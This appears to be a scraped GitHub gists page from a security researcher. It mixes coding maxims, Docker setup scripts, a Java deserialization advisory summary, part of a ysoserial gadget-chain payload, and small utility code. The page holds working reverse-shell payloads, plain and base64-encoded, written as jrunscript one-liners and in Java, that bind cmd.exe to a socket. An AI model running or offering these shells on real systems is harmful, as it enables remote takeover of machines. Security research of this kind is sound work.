- Thou shalt place time/space/resource constraints on all otherwise open-ended operations
- eg: timeouts, result counts, input sizes
- Thou shalt strive to measure any quantitive values that can vary over time or across samples
- eg: response times/counts, error counts,
- Thou shalt not accept, store, transmit, or display a numerical value without its respective units or context
- eg: timezones, metric/binary prefixes
Chris Frohoff frohoff
frohoff
/ ubuntu-docker-compose-up.sh
Last active
December 22, 2022 11:07
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash -xe | |
| DEBIAN_FRONTEND=noninteractive apt-get update && apt-get upgrade -y && apt-get -y install git python python-pip | |
| curl -s https://get.docker.com | sh | |
| service docker start | |
| pip install -U docker-compose | |
| mkdir /opt/docker.d |
frohoff
/ aws-docker-compose-up.sh
Last active
May 19, 2016 20:09
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash -xe | |
| yum update -y | |
| yum install -y git | |
| curl -s https://get.docker.com | sh | |
| service docker start | |
| chkconfig docker on | |
| pip install -U docker-compose |
Nashorn / Rhino:
- Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'- Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var host="localhost"; | |
| var port=8044; | |
| var cmd="cmd.exe"; | |
| var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close(); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| String host="localhost"; | |
| int port=8044; | |
| String cmd="cmd.exe"; | |
| Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); |
Chris Frohoff – Qualcomm Information Security and Risk Management
- Affected Product(s): Java SE 6, Java SE 7
- Fixed in: Java SE 7u25 (2013-06-18), Java SE 8 (2014-03-18)
- Vendor Contact: [email protected]
- Vulnerability Type: Unsafe Object Deserialization
frohoff
/ CommonsBeanutilsCollectionsLogging1.java
Created
November 19, 2015 14:15
commons beanutils gadget chain
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package ysoserial.payloads; | |
| import java.math.BigInteger; | |
| import java.util.Arrays; | |
| import java.util.PriorityQueue; | |
| import java.util.Queue; | |
| import org.apache.commons.beanutils.BeanComparator; | |
| import ysoserial.payloads.annotation.Dependencies; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| require 'open3' | |
| def replace(md, strip=false) | |
| rex = /```([a-zA-Z]+)\n(([^`\n]{3,}\n)*)```\s*```mdexec\n([^`\n]{3,}\n)*```/ | |
| replaced = md.gsub(rex) do |rep| | |
| int, code = $1, $2 | |
| if !strip |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| object Test extends App { | |
| lazy val flow: SplunkEvent => Seq[Email[Alert]] = | |
| receiveEvent andTap rawTap andThen | |
| convertToSecurityEvent andMaybeTap eventTap andMaybe | |
| classifyIfTrained andMaybeTap classificationTap andMaybeSeq | |
| aggregateByTimeWindow andForEach (_.sortBy(_.event.time)) andForEach | |
| convertToAlert andForEachTap alertTap andForEachOpt | |
| createEmail andForEachTap emailTap | |
| } |